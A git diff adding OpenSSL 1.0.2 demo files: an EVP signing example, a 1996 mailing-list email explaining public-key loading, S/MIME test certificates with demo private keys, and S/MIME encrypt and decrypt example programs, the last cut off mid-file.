diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/sign/sign.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/sign/sign.c
new file mode 100644
index 0000000..22f53fb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/sign/sign.c
@@ -0,0 +1,160 @@
+/* demos/sign/sign.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * sign-it.cpp - Simple test app using SSLeay envelopes to sign data
+ * 29.9.1996, Sampo Kellomaki <sampo@iki.fi>
+ */
+
+/* converted to C - eay :-) */
+
+/*
+ * reformated a bit and converted to use the more common functions: this was
+ * initially written at the dawn of time :-) - Steve.
+ */
+
+#include <stdio.h>
+#include <openssl/rsa.h>
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+#include <openssl/err.h>
+#include <openssl/pem.h>
+#include <openssl/ssl.h>
+
+int main()
+{
+    int err;
+    int sig_len;
+    unsigned char sig_buf[4096];
+    static char certfile[] = "cert.pem";
+    static char keyfile[] = "key.pem";
+    static char data[] = "I owe you...";
+    EVP_MD_CTX md_ctx;
+    EVP_PKEY *pkey;
+    FILE *fp;
+    X509 *x509;
+
+    /*
+     * Just load the crypto library error strings, SSL_load_error_strings()
+     * loads the crypto AND the SSL ones
+     */
+    /* SSL_load_error_strings(); */
+    ERR_load_crypto_strings();
+
+    /* Read private key */
+
+    fp = fopen(keyfile, "r");
+    if (fp == NULL)
+        exit(1);
+    pkey = PEM_read_PrivateKey(fp, NULL, NULL, NULL);
+    fclose(fp);
+
+    if (pkey == NULL) {
+        ERR_print_errors_fp(stderr);
+        exit(1);
+    }
+
+    /* Do the signature */
+
+    EVP_SignInit(&md_ctx, EVP_sha1());
+    EVP_SignUpdate(&md_ctx, data, strlen(data));
+    sig_len = sizeof(sig_buf);
+    err = EVP_SignFinal(&md_ctx, sig_buf, &sig_len, pkey);
+
+    if (err != 1) {
+        ERR_print_errors_fp(stderr);
+        exit(1);
+    }
+
+    EVP_PKEY_free(pkey);
+
+    /* Read public key */
+
+    fp = fopen(certfile, "r");
+    if (fp == NULL)
+        exit(1);
+    x509 = PEM_read_X509(fp, NULL, NULL, NULL);
+    fclose(fp);
+
+    if (x509 == NULL) {
+        ERR_print_errors_fp(stderr);
+        exit(1);
+    }
+
+    /* Get public key - eay */
+    pkey = X509_get_pubkey(x509);
+    if (pkey == NULL) {
+        ERR_print_errors_fp(stderr);
+        exit(1);
+    }
+
+    /* Verify the signature */
+
+    EVP_VerifyInit(&md_ctx, EVP_sha1());
+    EVP_VerifyUpdate(&md_ctx, data, strlen((char *)data));
+    err = EVP_VerifyFinal(&md_ctx, sig_buf, sig_len, pkey);
+    EVP_PKEY_free(pkey);
+
+    if (err != 1) {
+        ERR_print_errors_fp(stderr);
+        exit(1);
+    }
+    printf("Signature Verified Ok.\n");
+    return (0);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/sign/sign.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/sign/sign.txt
new file mode 100644
index 0000000..2aa2b46
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/sign/sign.txt
@@ -0,0 +1,170 @@
+From ssl-lists-owner@mincom.com Mon Sep 30 22:43:15 1996
+Received: from cygnus.mincom.oz.au by orb.mincom.oz.au with SMTP id AA12802
+  (5.65c/IDA-1.4.4 for eay); Mon, 30 Sep 1996 12:45:43 +1000
+Received: (from daemon@localhost) by cygnus.mincom.oz.au (8.7.5/8.7.3) id MAA25922 for ssl-users-outgoing; Mon, 30 Sep 1996 12:43:43 +1000 (EST)
+Received: from orb.mincom.oz.au (eay@orb.mincom.oz.au [192.55.197.1]) by cygnus.mincom.oz.au (8.7.5/8.7.3) with SMTP id MAA25900 for <ssl-users@listserv.mincom.oz.au>; Mon, 30 Sep 1996 12:43:39 +1000 (EST)
+Received: by orb.mincom.oz.au id AA12688
+  (5.65c/IDA-1.4.4 for ssl-users@listserv.mincom.oz.au); Mon, 30 Sep 1996 12:43:16 +1000
+Date: Mon, 30 Sep 1996 12:43:15 +1000 (EST)
+From: Eric Young <eay@mincom.com>
+X-Sender: eay@orb
+To: Sampo Kellomaki <sampo@neuronio.pt>
+Cc: ssl-users@mincom.com, sampo@brutus.neuronio.pt
+Subject: Re: Signing with envelope routines
+In-Reply-To: <199609300037.BAA08729@brutus.neuronio.pt>
+Message-Id: <Pine.SOL.3.91.960930121504.11800Y-100000@orb>
+Mime-Version: 1.0
+Content-Type: TEXT/PLAIN; charset=US-ASCII
+Sender: ssl-lists-owner@mincom.com
+Precedence: bulk
+Status: O
+X-Status: 
+
+
+On Mon, 30 Sep 1996, Sampo Kellomaki wrote:
+> I have been trying to figure out how to produce signatures with EVP_
+> routines. I seem to be able to read in private key and sign some
+> data ok, but I can't figure out how I am supposed to read in
+> public key so that I could verify my signature. I use self signed
+> certificate.
+
+hmm... a rather poorly documented are of the library at this point in time.
+
+> I figured I should use
+> 	EVP_PKEY* pkey = PEM_ASN1_read(d2i_PrivateKey, PEM_STRING_EVP_PKEY,
+> 	                               fp, NULL, NULL);
+> to read in private key and this seems to work Ok.
+> 
+> However when I try analogous
+> 	EVP_PKEY* pkey = PEM_ASN1_read(d2i_PublicKey, PEM_STRING_X509,
+> 	                               fp, NULL, NULL);
+
+What you should do is 
+	X509 *x509=PEM_read_X509(fp,NULL,NULL);
+	/* which is the same as PEM_ASN1_read(d2i_X509,PEM_STRING_X509,fp,
+	 * NULL,NULL); */
+Then
+	EVP_PKEY *pkey=X509_extract_key(x509);
+
+There is also a X509_REQ_extract_key(req);
+which gets the public key from a certificate request.
+
+I re-worked quite a bit of this when I cleaned up the dependancy on
+RSA as the private key.
+
+> I figured that the second argument to PEM_ASN1_read should match the
+> name in my PEM encoded object, hence PEM_STRING_X509.
+> PEM_STRING_EVP_PKEY seems to be somehow magical
+> because it matches whatever private key there happens to be. I could
+> not find a similar constant to use with getting the certificate, however.
+
+:-), PEM_STRING_EVP_PKEY is 'magical' :-).  In theory I should be using a
+standard such as PKCS#8 to store the private key so that the type is 
+encoded in the asn.1 encoding of the object.
+
+> Is my approach of using PEM_ASN1_read correct? What should I pass in
+> as name?  Can I use normal (or even self signed) X509 certificate for
+> verifying the signature?
+
+The actual public key is kept in the certificate, so basically you have 
+to load the certificate and then 'unpack' the public key from the 
+certificate.
+
+> When will SSLeay documentation be written ;-)? If I would contribute
+> comments to the code, would Eric take time to review them and include
+> them in distribution?
+
+:-) After SSLv3 and PKCS#7 :-).  I actually started doing a function list 
+but what I really need to do is do quite a few 'this is how you do xyz' 
+type documents.  I suppose the current method is to post to ssl-users and 
+I'll respond :-).
+
+I'll add a 'demo' directory for the next release, I've appended a 
+modified version of your program that works, you were very close :-).
+
+eric
+
+/* sign-it.cpp  -  Simple test app using SSLeay envelopes to sign data
+   29.9.1996, Sampo Kellomaki <sampo@iki.fi> */
+
+/* converted to C - eay :-) */
+
+#include <stdio.h>
+#include "rsa.h"
+#include "evp.h"
+#include "objects.h"
+#include "x509.h"
+#include "err.h"
+#include "pem.h"
+#include "ssl.h"
+
+void main ()
+{
+  int err;
+  int sig_len;
+  unsigned char sig_buf [4096];
+  static char certfile[] = "plain-cert.pem";
+  static char keyfile[]  = "plain-key.pem";
+  static char data[]     = "I owe you...";
+  EVP_MD_CTX     md_ctx;
+  EVP_PKEY *      pkey;
+  FILE *          fp;
+  X509 *	x509;
+
+  /* Just load the crypto library error strings,
+   * SSL_load_error_strings() loads the crypto AND the SSL ones */
+  /* SSL_load_error_strings();*/
+  ERR_load_crypto_strings();
+  
+  /* Read private key */
+  
+  fp = fopen (keyfile, "r");   if (fp == NULL) exit (1);
+  pkey = (EVP_PKEY*)PEM_ASN1_read ((char *(*)())d2i_PrivateKey,
+				   PEM_STRING_EVP_PKEY,
+				   fp,
+				   NULL, NULL);
+  if (pkey == NULL) {  ERR_print_errors_fp (stderr);    exit (1);  }
+  fclose (fp);
+  
+  /* Do the signature */
+  
+  EVP_SignInit   (&md_ctx, EVP_md5());
+  EVP_SignUpdate (&md_ctx, data, strlen(data));
+  sig_len = sizeof(sig_buf);
+  err = EVP_SignFinal (&md_ctx,
+		       sig_buf, 
+		       &sig_len,
+		       pkey);
+  if (err != 1) {  ERR_print_errors_fp (stderr);    exit (1);  }
+  EVP_PKEY_free (pkey);
+  
+  /* Read public key */
+  
+  fp = fopen (certfile, "r");   if (fp == NULL) exit (1);
+  x509 = (X509 *)PEM_ASN1_read ((char *(*)())d2i_X509,
+				   PEM_STRING_X509,
+				   fp, NULL, NULL);
+  if (x509 == NULL) {  ERR_print_errors_fp (stderr);    exit (1);  }
+  fclose (fp);
+  
+  /* Get public key - eay */
+  pkey=X509_extract_key(x509);
+  if (pkey == NULL) {  ERR_print_errors_fp (stderr);    exit (1);  }
+
+  /* Verify the signature */
+  
+  EVP_VerifyInit   (&md_ctx, EVP_md5());
+  EVP_VerifyUpdate (&md_ctx, data, strlen((char*)data));
+  err = EVP_VerifyFinal (&md_ctx,
+			 sig_buf,
+			 sig_len,
+			 pkey);
+  if (err != 1) {  ERR_print_errors_fp (stderr);    exit (1);  }
+  EVP_PKEY_free (pkey);
+  printf ("Signature Verified Ok.\n");
+}
+
+
+
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/cacert.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/cacert.pem
new file mode 100644
index 0000000..75cbb34
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/cacert.pem
@@ -0,0 +1,18 @@
+-----BEGIN CERTIFICATE-----
+MIIC6DCCAlGgAwIBAgIJAMfGO3rdo2uUMA0GCSqGSIb3DQEBBAUAMFcxCzAJBgNV
+BAYTAlVLMRIwEAYDVQQHEwlUZXN0IENpdHkxFjAUBgNVBAoTDU9wZW5TU0wgR3Jv
+dXAxHDAaBgNVBAMTE1Rlc3QgUy9NSU1FIFJvb3QgQ0EwHhcNMDcwNDEzMTc0MzE3
+WhcNMTcwNDEwMTc0MzE3WjBXMQswCQYDVQQGEwJVSzESMBAGA1UEBxMJVGVzdCBD
+aXR5MRYwFAYDVQQKEw1PcGVuU1NMIEdyb3VwMRwwGgYDVQQDExNUZXN0IFMvTUlN
+RSBSb290IENBMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqJMal1uC1/1wz
+i5+dE4EZF2im3BgROm5PVMbwPY9V1t+KYvtdc3rMcRgJaMbP+qaEcDXoIsZfYXGR
+ielgfDNZmZcj1y/FOum+Jc2OZMs3ggPmjIQ3dbBECq0hZKcbz7wfr+2OeNWm46iT
+jcSIXpGIRhUYEzOgv7zb8oOU70IbbwIDAQABo4G7MIG4MB0GA1UdDgQWBBRHUypx
+CXFQYqewhGo72lWPQUsjoDCBiAYDVR0jBIGAMH6AFEdTKnEJcVBip7CEajvaVY9B
+SyOgoVukWTBXMQswCQYDVQQGEwJVSzESMBAGA1UEBxMJVGVzdCBDaXR5MRYwFAYD
+VQQKEw1PcGVuU1NMIEdyb3VwMRwwGgYDVQQDExNUZXN0IFMvTUlNRSBSb290IENB
+ggkAx8Y7et2ja5QwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQQFAAOBgQANI+Yc
+G/YDM1WMUGEzEkU9UhsIUqdyBebnK3+OyxZSouDcE/M10jFJzBf/F5b0uUGAKWwo
+u0dzmILfKjdfWe8EyCRafZcm00rVcO09i/63FBYzlHbmfUATIqZdhKzxxQMPs5mF
+1je+pHUpzIY8TSXyh/uD9IkAy04IHwGZQf9akw==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/cakey.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/cakey.pem
new file mode 100644
index 0000000..3b53c5e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/cakey.pem
@@ -0,0 +1,15 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIICXgIBAAKBgQCqJMal1uC1/1wzi5+dE4EZF2im3BgROm5PVMbwPY9V1t+KYvtd
+c3rMcRgJaMbP+qaEcDXoIsZfYXGRielgfDNZmZcj1y/FOum+Jc2OZMs3ggPmjIQ3
+dbBECq0hZKcbz7wfr+2OeNWm46iTjcSIXpGIRhUYEzOgv7zb8oOU70IbbwIDAQAB
+AoGBAKWOZ2UTc1BkjDjz0XoscmAR8Rj77MdGzfOPkIxPultSW+3yZpkGNyUbnsH5
+HAtf4Avai/m3bMN+s91kDpx9/g/I9ZEHPQLcDICETvwt/EHT7+hwvaQgsM+TgpMs
+tjlGZOWent6wVIuvwwzqOMXZLgK9FvY7upwgtrys4G3Kab5hAkEA2QzFflWyEvKS
+rMSaVtn/IjFilwa7H0IdakkjM34z4peerFTPBr4J47YD4RCR/dAvxyNy3zUxtH18
+9R6dUixI6QJBAMitJD0xOkbGWBX8KVJvRiKOIdf/95ZUAgN/h3bWKy57EB9NYj3u
+jbxXcvdjfSqiITykkjAg7SG7nrlzJsu6CpcCQG6gVsy0auXDY0TRlASuaZ6I40Is
+uRUOgqWYj2uAaHuWYdZeB4LdO3cnX0TISFDAWom6JKNlnmbrCtR4fSDT13kCQQCU
++VQJyV3F5MDHsWbLt6eNR46AV5lpk/vatPXPlrZ/zwPs+PmRmGLICvNiDA2DdNDP
+wCx2Zjsj67CtY3rNitMJAkEAm09BQnjnbBXUb1rd2SjNDWTsu80Z+zLu8pAwXNhW
+8nsvMYqlYMIxuMPwu/QuTnMRhMZ08uhqoD3ukZnBeoMEVg==
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/encr.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/encr.txt
new file mode 100644
index 0000000..f163a32
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/encr.txt
@@ -0,0 +1,3 @@
+Content-type: text/plain
+
+Sample OpenSSL Data for PKCS#7 encryption
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/sign.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/sign.txt
new file mode 100644
index 0000000..af1341d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/sign.txt
@@ -0,0 +1,3 @@
+Content-type: text/plain
+
+Test OpenSSL Signed Content
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/signer.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/signer.pem
new file mode 100644
index 0000000..bac16ba
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/signer.pem
@@ -0,0 +1,32 @@
+-----BEGIN CERTIFICATE-----
+MIICpjCCAg+gAwIBAgIJAJ+rfmEoLQRhMA0GCSqGSIb3DQEBBAUAMFcxCzAJBgNV
+BAYTAlVLMRIwEAYDVQQHEwlUZXN0IENpdHkxFjAUBgNVBAoTDU9wZW5TU0wgR3Jv
+dXAxHDAaBgNVBAMTE1Rlc3QgUy9NSU1FIFJvb3QgQ0EwHhcNMDcwNDEzMTgyOTI3
+WhcNMTcwNDA5MTgyOTI3WjBWMQswCQYDVQQGEwJVSzElMCMGA1UEAxMcT3BlblNT
+TCB0ZXN0IFMvTUlNRSBzaWduZXIgMTEgMB4GCSqGSIb3DQEJARYRdGVzdDFAb3Bl
+bnNzbC5vcmcwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAL1ocAQ7ON2pIUXz
+jwKPzpPB9ozB6PFG6F6kARO+i0DiT6Qn8abUjwpHPU+lGys83QlpbkQVUD6Fv/4L
+ytihk6N9Pr/feECVcSZ20dI43WXjfYak14dSVrZkGNMMXqKmnnqtkAdD0oJN7A7y
+gcf8RuViV0kvk9/36eCMwMHrImfhAgMBAAGjezB5MAkGA1UdEwQCMAAwLAYJYIZI
+AYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1UdDgQW
+BBSyKqjvctIsFNBHULBTqr8SHtSxpDAfBgNVHSMEGDAWgBRHUypxCXFQYqewhGo7
+2lWPQUsjoDANBgkqhkiG9w0BAQQFAAOBgQBvdYVoBfd4RV/xWSMXIcgw/i5OiwyX
+MsenQePll51MpglfArd7pUipUalCqlJt/Gs8kD16Ih1z1yuWYVTMlnDZ0PwbIOYn
++Jr8XLF9b1SMJt6PwckZZ0LZdIi2KwGAxVsIW1kjJAqu9o4YH37XW37yYdQRxfvv
+lDiQlgX0JtmLgA==
+-----END CERTIFICATE-----
+-----BEGIN RSA PRIVATE KEY-----
+MIICXAIBAAKBgQC9aHAEOzjdqSFF848Cj86TwfaMwejxRuhepAETvotA4k+kJ/Gm
+1I8KRz1PpRsrPN0JaW5EFVA+hb/+C8rYoZOjfT6/33hAlXEmdtHSON1l432GpNeH
+Ula2ZBjTDF6ipp56rZAHQ9KCTewO8oHH/EblYldJL5Pf9+ngjMDB6yJn4QIDAQAB
+AoGACCuYIWaYll80UzslYRvo8lC8nOfEb5v6bBKxBTQD98GLY+5hKywiG3RlPalG
+mb/fXQeSPReaRYgpdwD1OBEIOEMW9kLyqpzokC0xjpZ+MwsuJTlxCesk5GEsMa3o
+wC3QMmiRA7qrZ/SzTtwrs++9mZ/pxp8JZ6pKYUj8SE7/vV0CQQDz8Ix2t40E16hx
+04+XhClnGqydZJyLLSxcTU3ZVhYxL+efo/5hZ8tKpkcDi8wq6T03BOKrKxrlIW55
+qDRNM24rAkEAxsWzu/rJhIouQyNoYygEIEYzFRlTQyZSg59u6dNiewMn27dOAbyc
+YT7B6da7e74QttTXo0lIllsX2S38+XsIIwJBANSRuIU3G66tkr5l4gnhhAaxqtuY
+sgVhvvdL8dvC9aG1Ifzt9hzBSthpHxbK+oYmK07HdhI8hLpIMLHYzoK7n3MCQEy4
+4rccBcxyyYiAkjozp+QNNIpgTBMPJ6pGT7lRLiHtBeV4y1NASdv/LTnk+Fi69Bid
+7t3H24ytfHcHmS1yn6ECQF6Jmh4C7dlvp59zXp+t+VsXxa/8sq41vKNIj0Rx9vh5
+xp9XL0C5ZpgmBnsTydP9pmkiL4ltLbMX0wJU6N2cmFw=
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/signer2.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/signer2.pem
new file mode 100644
index 0000000..25e23d1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/signer2.pem
@@ -0,0 +1,32 @@
+-----BEGIN CERTIFICATE-----
+MIICpjCCAg+gAwIBAgIJAJ+rfmEoLQRiMA0GCSqGSIb3DQEBBAUAMFcxCzAJBgNV
+BAYTAlVLMRIwEAYDVQQHEwlUZXN0IENpdHkxFjAUBgNVBAoTDU9wZW5TU0wgR3Jv
+dXAxHDAaBgNVBAMTE1Rlc3QgUy9NSU1FIFJvb3QgQ0EwHhcNMDcwNDEzMTgyOTQ0
+WhcNMTcwNDA5MTgyOTQ0WjBWMQswCQYDVQQGEwJVSzElMCMGA1UEAxMcT3BlblNT
+TCB0ZXN0IFMvTUlNRSBzaWduZXIgMjEgMB4GCSqGSIb3DQEJARYRdGVzdDJAb3Bl
+bnNzbC5vcmcwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANco7VPgX9vcGwmZ
+jYqjq1JiR7M38dsMNhuJyLRVjJ5/cpFluQydQuG1PhzOJ8zfYVFicOXKvbYuKuXW
+ozZIwzqEqWsNf36KHTLS6yOMG8I13cRInh+fAIKq9Z8Eh65I7FJzVsNsfEQrGfEW
+GMA8us24IaSvP3QkbfHJn/4RaKznAgMBAAGjezB5MAkGA1UdEwQCMAAwLAYJYIZI
+AYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1UdDgQW
+BBRlrLQJUB8uAa4q8B2OqvvTXonF5zAfBgNVHSMEGDAWgBRHUypxCXFQYqewhGo7
+2lWPQUsjoDANBgkqhkiG9w0BAQQFAAOBgQBQbi2juGALg2k9m1hKpzR2lCGmGO3X
+h3Jh/l0vIxDr0RTgP2vBrtITlx655P/o1snoeTIpYG8uUnFnTE/6YakdayAIlxV4
+aZl63AivZMpQB5SPaPH/jEsGJ8UQMfdiy4ORWIULupuPKlKwODNw7tVhQIACS/DR
+2aX6rl2JEuJ5Yg==
+-----END CERTIFICATE-----
+-----BEGIN RSA PRIVATE KEY-----
+MIICXAIBAAKBgQDXKO1T4F/b3BsJmY2Ko6tSYkezN/HbDDYbici0VYyef3KRZbkM
+nULhtT4czifM32FRYnDlyr22Lirl1qM2SMM6hKlrDX9+ih0y0usjjBvCNd3ESJ4f
+nwCCqvWfBIeuSOxSc1bDbHxEKxnxFhjAPLrNuCGkrz90JG3xyZ/+EWis5wIDAQAB
+AoGAUTB2bcIrKfGimjrBOGGOUmYXnD8uGnQ/LqENhU8K4vxApTD3ZRUqmbUknQYF
+6r8YH/e/llasw8QkF9qod+F5GTgsnyh/aMidFHKrXXbf1662scz9+S6crSXq9Eb2
+CL57f6Kw61k6edrz8zHdA+rnTK00hzgzKCP4ZL5k8/55ueECQQD+BK+nsKi6CcKf
+m3Mh61Sf2Icm5JlMCKaihlbnh78lBN1imYUAfHJEnQ1ujxXB94R+6o9S+XrWTnTX
+2m/JNIfpAkEA2NaidX7Sv5jnRPkwJ02Srl0urxINLmg4bU0zmM3VoMklYBHWnMyr
+upPZGPh5TzCa+g6FTBmU8XK61wvnEKNcTwJBAM24VdnlBIDGbsx8RJ3vzLU30xz4
+ff5J80okqjUQhwkgC3tTAZgHMTPITZyAXQqdvrxakoCMc6MkHxTBX08AMCECQHHL
+SdyxXrYv7waSY0PtANJCkpJLveEhzqMFxdMmCjtj9BpTojYNbv3uQxtIopj9YAdk
+gW2ray++zvC2DV/86x8CQH4UJwgO6JqU4bSgi6HiRNjDg26tJ0Beu8jjl1vrkIVX
+pHFwSUeLZUsT2/iTUSgYH4uYiZPgYNcKTCT9W6se30A=
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/smdec.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/smdec.c
new file mode 100644
index 0000000..6814d51
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/smdec.c
@@ -0,0 +1,78 @@
+/* Simple S/MIME signing example */
+#include <openssl/pem.h>
+#include <openssl/pkcs7.h>
+#include <openssl/err.h>
+
+int main(int argc, char **argv)
+{
+    BIO *in = NULL, *out = NULL, *tbio = NULL;
+    X509 *rcert = NULL;
+    EVP_PKEY *rkey = NULL;
+    PKCS7 *p7 = NULL;
+    int ret = 1;
+
+    OpenSSL_add_all_algorithms();
+    ERR_load_crypto_strings();
+
+    /* Read in recipient certificate and private key */
+    tbio = BIO_new_file("signer.pem", "r");
+
+    if (!tbio)
+        goto err;
+
+    rcert = PEM_read_bio_X509(tbio, NULL, 0, NULL);
+
+    BIO_reset(tbio);
+
+    rkey = PEM_read_bio_PrivateKey(tbio, NULL, 0, NULL);
+
+    if (!rcert || !rkey)
+        goto err;
+
+    /* Open content being signed */
+
+    in = BIO_new_file("smencr.txt", "r");
+
+    if (!in)
+        goto err;
+
+    /* Sign content */
+    p7 = SMIME_read_PKCS7(in, NULL);
+
+    if (!p7)
+        goto err;
+
+    out = BIO_new_file("encrout.txt", "w");
+    if (!out)
+        goto err;
+
+    /* Decrypt S/MIME message */
+    if (!PKCS7_decrypt(p7, rkey, rcert, out, 0))
+        goto err;
+
+    ret = 0;
+
+ err:
+
+    if (ret) {
+        fprintf(stderr, "Error Signing Data\n");
+        ERR_print_errors_fp(stderr);
+    }
+
+    if (p7)
+        PKCS7_free(p7);
+    if (rcert)
+        X509_free(rcert);
+    if (rkey)
+        EVP_PKEY_free(rkey);
+
+    if (in)
+        BIO_free(in);
+    if (out)
+        BIO_free(out);
+    if (tbio)
+        BIO_free(tbio);
+
+    return ret;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/smenc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/smenc.c
new file mode 100644
index 0000000..18bf7b1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/smenc.c
@@ -0,0 +1,92 @@
+/* Simple S/MIME encrypt example */
+#include <openssl/pem.h>
+#include <openssl/pkcs7.h>
+#include <openssl/err.h>
+
+int main(int argc, char **argv)
+{
+    BIO *in = NULL, *out = NULL, *tbio = NULL;
+    X509 *rcert = NULL;
+    STACK_OF(X509) *recips = NULL;
+    PKCS7 *p7 = NULL;
+    int ret = 1;
+
+    /*
+     * On OpenSSL 0.9.9 only:
+     * for streaming set PKCS7_STREAM
+     */
+    int flags = PKCS7_STREAM;
+
+    OpenSSL_add_all_algorithms();
+    ERR_load_crypto_strings();
+
+    /* Read in recipient certificate */
+    tbio = BIO_new_file("signer.pem", "r");
+
+    if (!tbio)
+        goto err;
+
+    rcert = PEM_read_bio_X509(tbio, NULL, 0, NULL);
+
+    if (!rcert)
+        goto err;
+
+    /* Create recipient STACK and add recipient cert to it */
+    recips = sk_X509_new_null();
+
+    if (!recips || !sk_X509_push(recips, rcert))
+        goto err;
+
+    /*
+     * sk_X509_pop_free will free up recipient STACK and its contents so set
+     * rcert to NULL so it isn't freed up twice.
+     */
+    rcert = NULL;
+
+    /* Open content being encrypted */
+
+    in = BIO_new_file("encr.txt", "r");
+
+    if (!in)
+        goto err;
+
+    /* encrypt content */
+    p7 = PKCS7_encrypt(recips, in, EVP_des_ede3_cbc(), flags);
+
+    if (!p7)
+        goto err;
+
+    out = BIO_new_file("smencr.txt", "w");
+    if (!out)
+        goto err;
+
+    /* Write out S/MIME message */
+    if (!SMIME_write_PKCS7(out, p7, in, flags))
+        goto err;
+
+    ret = 0;
+
+ err:
+
+    if (ret) {
+        fprintf(stderr, "Error Encrypting Data\n");
+        ERR_print_errors_fp(stderr);
+    }
+
+    if (p7)
+        PKCS7_free(p7);
+    if (rcert)
+        X509_free(rcert);
+    if (recips)
+        sk_X509_pop_free(recips, X509_free);
+
+    if (in)
+        BIO_free(in);
+    if (out)
+        BIO_free(out);
+    if (tbio)
+        BIO_free(tbio);
